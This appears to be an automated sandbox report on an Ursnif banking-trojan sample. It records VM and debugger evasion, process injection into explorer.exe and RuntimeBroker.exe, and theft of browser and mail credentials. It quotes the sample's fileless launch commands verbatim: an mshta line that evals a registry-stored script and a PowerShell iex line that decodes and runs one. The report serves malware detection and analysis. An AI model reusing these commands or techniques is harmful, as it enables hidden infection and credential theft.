Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5042
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2643

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FA32BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_04FA32BA
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEA85C FindFirstFileW,DeleteFileW,FindNextFileW,	30_2_04DEA85C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF0C34 FindFirstFileW,	30_2_04DF0C34
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00180 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	30_2_04E00180

Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Windows\System32\RuntimeBroker.exe	File opened: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy

Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001E.00000000.491040385.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: WerFault.exe, 00000025.00000002.529289252.0000000004EB0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW@X
Source: RuntimeBroker.exe, 00000021.00000000.487413286.0000021DB5A53000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000000.491040385.00000000063F6000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel
Source: WerFault.exe, 00000025.00000002.529150553.0000000004DF7000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: vpci Microsoft Hyper-V Virt Kernel
Source: explorer.exe, 0000001E.00000000.498755942.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: storflt Microsoft Hyper-V Stor Kernel
Source: explorer.exe, 0000001E.00000003.516196140.000000000E602000.00000004.00000040.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 0000001E.00000000.498755942.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001E.00000000.499070200.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 0000001E.00000002.691931764.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 0000001E.00000000.488506087.0000000005D50000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000002.697281300.0000021DB88C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory allocated: C:\Windows\System32\rundll32.exe base: 1ED55030000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: unknown base: 7FFD88E31580 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\control.exe	Thread created: unknown EIP: 88E31580

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 5D6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 2E60000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3440 base: 7FFD88E31580 value: 40

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe	Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\regsvr32.exe	Thread register set: target process: 5548	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440
Source: C:\Windows\explorer.exe	Thread register set: target process: 3092
Source: C:\Windows\explorer.exe	Thread register set: target process: 4252
Source: C:\Windows\explorer.exe	Thread register set: target process: 4572
Source: C:\Windows\explorer.exe	Thread register set: target process: 5724
Source: C:\Windows\explorer.exe	Thread register set: target process: 5720
Source: C:\Windows\explorer.exe	Thread register set: target process: 6208
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3440
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4724

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6E38C12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6E38C12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 5D6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2E60000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 515ACF8000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 21DB7DC0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 789A63E000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 219109E0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFD88E31580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF73E955FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1ED55030000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF73E955FD0

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'

Source: explorer.exe, 0000001E.00000000.499031420.00000000083EB000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 0000001E.00000002.692987327.0000000000EE0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000021.00000000.488015831.0000021DB5F90000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA93D5 cpuid

1_2_04FA93D5

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA1A4E GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

1_2_04FA1A4E

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA93D5 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

1_2_04FA93D5

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_04FA6A7F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_04FA6A7F

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
